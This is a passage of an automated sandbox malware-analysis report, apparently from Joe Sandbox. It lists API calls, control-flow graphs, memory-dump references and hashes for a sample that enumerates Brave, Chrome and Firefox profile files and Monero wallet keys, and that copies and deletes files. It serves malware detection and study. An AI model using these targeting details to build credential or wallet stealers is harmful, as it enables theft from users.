                                    • Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                    • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                    • API String ID: 3334442632-726946144
                                    • Opcode ID: 192a8b322d5e165a00e1fd934482001670f9b1a8564a063173a4bbdeb139e266
                                    • Instruction ID: 9d39b8a71643c28959ef1f1dc4987ff5ac94ebc02f75b754317e2b685cabebd9
                                    • Opcode Fuzzy Hash: 192a8b322d5e165a00e1fd934482001670f9b1a8564a063173a4bbdeb139e266
                                    • Instruction Fuzzy Hash: E1420172910104ABCF14FB60DD96EEE777DAFA5300F804568B90A56191EF34AB4DCBE2

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1907 6c6735a0-6c6735be 1908 6c6735c4-6c6735ed InitializeCriticalSectionAndSpinCount getenv 1907->1908 1909 6c6738e9-6c6738fb call 6c6ab320 1907->1909 1910 6c6735f3-6c6735f5 1908->1910 1911 6c6738fc-6c67390c strcmp 1908->1911 1913 6c6735f8-6c673614 QueryPerformanceFrequency 1910->1913 1911->1910 1915 6c673912-6c673922 strcmp 1911->1915 1916 6c67374f-6c673756 1913->1916 1917 6c67361a-6c67361c 1913->1917 1918 6c673924-6c673932 1915->1918 1919 6c67398a-6c67398c 1915->1919 1922 6c67396e-6c673982 1916->1922 1923 6c67375c-6c673768 1916->1923 1920 6c673622-6c67364a _strnicmp 1917->1920 1921 6c67393d 1917->1921 1918->1920 1924 6c673938 1918->1924 1919->1913 1925 6c673944-6c673957 _strnicmp 1920->1925 1926 6c673650-6c67365e 1920->1926 1921->1925 1922->1919 1927 6c67376a-6c6737a1 QueryPerformanceCounter EnterCriticalSection 1923->1927 1924->1916 1925->1926 1928 6c67395d-6c67395f 1925->1928 1926->1928 1929 6c673664-6c6736a9 GetSystemTimeAdjustment 1926->1929 1930 6c6737b3-6c6737eb LeaveCriticalSection QueryPerformanceCounter EnterCriticalSection 1927->1930 1931 6c6737a3-6c6737b1 1927->1931 1932 6c673964 1929->1932 1933 6c6736af-6c673749 call 6c6ac110 1929->1933 1934 6c6737ed-6c6737fa 1930->1934 1935 6c6737fc-6c673839 LeaveCriticalSection 1930->1935 1931->1930 1932->1922 1933->1916 1934->1935 1936 6c673846-6c6738ac call 6c6ac110 1935->1936 1937 6c67383b-6c673840 1935->1937 1942 6c6738b2-6c6738ca 1936->1942 1937->1927 1937->1936 1943 6c6738dd-6c6738e3 1942->1943 1944 6c6738cc-6c6738db 1942->1944 1943->1909 1944->1942 1944->1943
                                    APIs
                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(6C6FF688,00001000), ref: 6C6735D5
                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C6735E0
                                    • QueryPerformanceFrequency.KERNEL32(?), ref: 6C6735FD
                                    • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C67363F
                                    • GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C67369F
                                    • __aulldiv.LIBCMT ref: 6C6736E4
                                    • QueryPerformanceCounter.KERNEL32(?), ref: 6C673773
                                    • EnterCriticalSection.KERNEL32(6C6FF688), ref: 6C67377E
                                    • LeaveCriticalSection.KERNEL32(6C6FF688), ref: 6C6737BD
                                    • QueryPerformanceCounter.KERNEL32(?), ref: 6C6737C4
                                    • EnterCriticalSection.KERNEL32(6C6FF688), ref: 6C6737CB
                                    • LeaveCriticalSection.KERNEL32(6C6FF688), ref: 6C673801
                                    • __aulldiv.LIBCMT ref: 6C673883
                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,QPC), ref: 6C673902
                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,GTC), ref: 6C673918
                                    • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,AuthcAMDenti,0000000C), ref: 6C67394C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true
                                    • Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                    Similarity
                                    • API ID: CriticalSection$PerformanceQuery$CounterEnterLeave__aulldiv_strnicmpstrcmp$AdjustmentCountFrequencyInitializeSpinSystemTimegetenv
                                    • String ID: AuthcAMDenti$GTC$GenuntelineI$MOZ_TIMESTAMP_MODE$QPC
                                    • API String ID: 301339242-3790311718
                                    • Opcode ID: 81aa848bdf0ff1b5a4f893ab737a37b5ebc876d352032505d3e1a3297de56531
                                    • Instruction ID: 19efee6e53d458ba148fe980800ed72d67073c053ae41af0c54b9a023f1586b1
                                    • Opcode Fuzzy Hash: 81aa848bdf0ff1b5a4f893ab737a37b5ebc876d352032505d3e1a3297de56531
                                    • Instruction Fuzzy Hash: 7FB1B471B093109BDB18DF2AD49461A7BF7AB8A700F04893DE5A9D3750EB309801CB9E

                                    Control-flow Graph

                                    APIs
                                    • wsprintfA.USER32 ref: 0019440C
                                    • FindFirstFileA.KERNEL32(?,?), ref: 00194423
                                    • StrCmpCA.SHLWAPI(?,001A0FAC), ref: 00194451
                                    • StrCmpCA.SHLWAPI(?,001A0FB0), ref: 00194467
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0019465D
                                    • FindClose.KERNEL32(000000FF), ref: 00194672
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID: Find$File$CloseFirstNextwsprintf
                                    • String ID: %s\%s$%s\%s$%s\*
                                    • API String ID: 180737720-445461498
                                    • Opcode ID: d8121e18ab355c16b4a53be3eb9845a4ea3376df39493cea775aacd6493258bd
                                    • Instruction ID: e9e4892eaa8400fe3a90b5ac4d64536a30f00c092087b243a3a0dd94f4befd0e
                                    • Opcode Fuzzy Hash: d8121e18ab355c16b4a53be3eb9845a4ea3376df39493cea775aacd6493258bd
                                    • Instruction Fuzzy Hash: CA615772910218AFCF25EBA0DC45FEA777CBB5A701F008598F50A97141EB74AB49CFA1
                                    APIs
                                    • wsprintfA.USER32 ref: 001939D3
                                    • FindFirstFileA.KERNEL32(?,?), ref: 001939EA
                                    • StrCmpCA.SHLWAPI(?,001A0F7C), ref: 00193A18
                                    • StrCmpCA.SHLWAPI(?,001A0F80), ref: 00193A2E
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00193B7C
                                    • FindClose.KERNEL32(000000FF), ref: 00193B91
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID: Find$File$CloseFirstNextwsprintf
                                    • String ID: %s\%s
                                    • API String ID: 180737720-4073750446
                                    • Opcode ID: b994fc0ad92d24ddf808cb7b6bc14712400d7a974362d44a48ec2a041f852ccd
                                    • Instruction ID: d65e4dfe3b4bd5fb492620662031660e2e415846b12c91051758be45d488855c
                                    • Opcode Fuzzy Hash: b994fc0ad92d24ddf808cb7b6bc14712400d7a974362d44a48ec2a041f852ccd
                                    • Instruction Fuzzy Hash: C9519BB1900118ABCF25EBB0DC85EEE773CBF55300F408588B61A93040DB749B89CFA4
                                    APIs
                                      • Part of subcall function 0019A110: lstrcpy.KERNEL32(001A0DFF,00000000), ref: 0019A158
                                      • Part of subcall function 0019A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0019A342
                                      • Part of subcall function 0019A2F0: lstrcat.KERNEL32(00000000), ref: 0019A352
                                      • Part of subcall function 0019A380: lstrlen.KERNEL32(?,013A8830,?,\Monero\wallet.keys,001A0DFF), ref: 0019A395
                                      • Part of subcall function 0019A380: lstrcpy.KERNEL32(00000000), ref: 0019A3D4
                                      • Part of subcall function 0019A380: lstrcat.KERNEL32(00000000,00000000), ref: 0019A3E2
                                      • Part of subcall function 0019A270: lstrcpy.KERNEL32(?,001A0DFF), ref: 0019A2D5
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,001A155C,001A0D7E), ref: 0018F55E
                                    • StrCmpCA.SHLWAPI(?,001A1560), ref: 0018F5AF
                                    • StrCmpCA.SHLWAPI(?,001A1564), ref: 0018F5C5
                                    • FindNextFileA.KERNELBASE(000000FF,?), ref: 0018F8F1
                                    • FindClose.KERNEL32(000000FF), ref: 0018F903
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                    • String ID: prefs.js
                                    • API String ID: 3334442632-3783873740
                                    • Opcode ID: 49dd92c9a1f71c6bedbac9038de3dfc60cbd5dcf40ecd1bb512eae46d1b5fde2
                                    • Instruction ID: a9408ead7a71707be6b81a1d1b5708fb8e97c49f9280374b59996855ec659a63
                                    • Opcode Fuzzy Hash: 49dd92c9a1f71c6bedbac9038de3dfc60cbd5dcf40ecd1bb512eae46d1b5fde2
                                    • Instruction Fuzzy Hash: 90B10E719002189BCF24FF64DC96AEE7779AFA5300F8085A8A80A57151EF716B4DCFD2
                                    APIs
                                      • Part of subcall function 0019A110: lstrcpy.KERNEL32(001A0DFF,00000000), ref: 0019A158
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,001A500C,?,?,?,001A50B4,?,?,00000000,?,00000000), ref: 00181963
                                    • StrCmpCA.SHLWAPI(?,001A515C), ref: 001819B3
                                    • StrCmpCA.SHLWAPI(?,001A5204), ref: 001819C9
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00181D80
                                    • DeleteFileA.KERNEL32(00000000), ref: 00181E0A
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00181E60
                                    • FindClose.KERNEL32(000000FF), ref: 00181E72
                                      • Part of subcall function 0019A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0019A342
                                      • Part of subcall function 0019A2F0: lstrcat.KERNEL32(00000000), ref: 0019A352
                                      • Part of subcall function 0019A380: lstrlen.KERNEL32(?,013A8830,?,\Monero\wallet.keys,001A0DFF), ref: 0019A395
                                      • Part of subcall function 0019A380: lstrcpy.KERNEL32(00000000), ref: 0019A3D4
                                      • Part of subcall function 0019A380: lstrcat.KERNEL32(00000000,00000000), ref: 0019A3E2
                                      • Part of subcall function 0019A270: lstrcpy.KERNEL32(?,001A0DFF), ref: 0019A2D5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                    • String ID: \*.*
                                    • API String ID: 1415058207-1173974218
                                    • Opcode ID: d177ccd244b2114066173bfcf458c791e5f25fc7a9ec6dd7c45afa2015e24b8a
                                    • Instruction ID: 3338157467f7b29f6dec599438af84d3750a0b9070c0c89abae0152f93b4dee3
                                    • Opcode Fuzzy Hash: d177ccd244b2114066173bfcf458c791e5f25fc7a9ec6dd7c45afa2015e24b8a
                                    • Instruction Fuzzy Hash: 4F12BF71910118ABCF19FB60DC96AEE737DAF65300F8045A9B50A62091EF706B8DCFD2
                                    APIs
                                      • Part of subcall function 0019A110: lstrcpy.KERNEL32(001A0DFF,00000000), ref: 0019A158
                                      • Part of subcall function 0019A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0019A342
                                      • Part of subcall function 0019A2F0: lstrcat.KERNEL32(00000000), ref: 0019A352
                                      • Part of subcall function 0019A380: lstrlen.KERNEL32(?,013A8830,?,\Monero\wallet.keys,001A0DFF), ref: 0019A395
                                      • Part of subcall function 0019A380: lstrcpy.KERNEL32(00000000), ref: 0019A3D4
                                      • Part of subcall function 0019A380: lstrcat.KERNEL32(00000000,00000000), ref: 0019A3E2
                                      • Part of subcall function 0019A270: lstrcpy.KERNEL32(?,001A0DFF), ref: 0019A2D5
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,001A1454,001A0B96), ref: 0018D92B
                                    • StrCmpCA.SHLWAPI(?,001A1458), ref: 0018D973
                                    • StrCmpCA.SHLWAPI(?,001A145C), ref: 0018D989
                                    • FindNextFileA.KERNELBASE(000000FF,?), ref: 0018DC0C
                                    • FindClose.KERNEL32(000000FF), ref: 0018DC1E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                    • String ID:
                                    • API String ID: 3334442632-0
                                    • Opcode ID: ca2b8d7cfe61138feee17704d5daf0b992058dd8a1dcdffc470e0fc55302c434
                                    • Instruction ID: 97616ef2a69815fedc7d183493085600e443dbb6b2bca040681f7e43d032c880
                                    • Opcode Fuzzy Hash: ca2b8d7cfe61138feee17704d5daf0b992058dd8a1dcdffc470e0fc55302c434
                                    • Instruction Fuzzy Hash: CC910E72900204AACF14FB74EC96DED777DAFA5300F408668F90A96591EF349B5C8BD2
                                    APIs
                                      • Part of subcall function 0019A110: lstrcpy.KERNEL32(001A0DFF,00000000), ref: 0019A158
                                    • GetKeyboardLayoutList.USER32(00000000,00000000,001A059F), ref: 00197681
                                    • LocalAlloc.KERNEL32(00000040,?), ref: 00197699
                                    • GetKeyboardLayoutList.USER32(?,00000000), ref: 001976AD
                                    • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00197702
                                    • LocalFree.KERNEL32(00000000), ref: 001977C2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
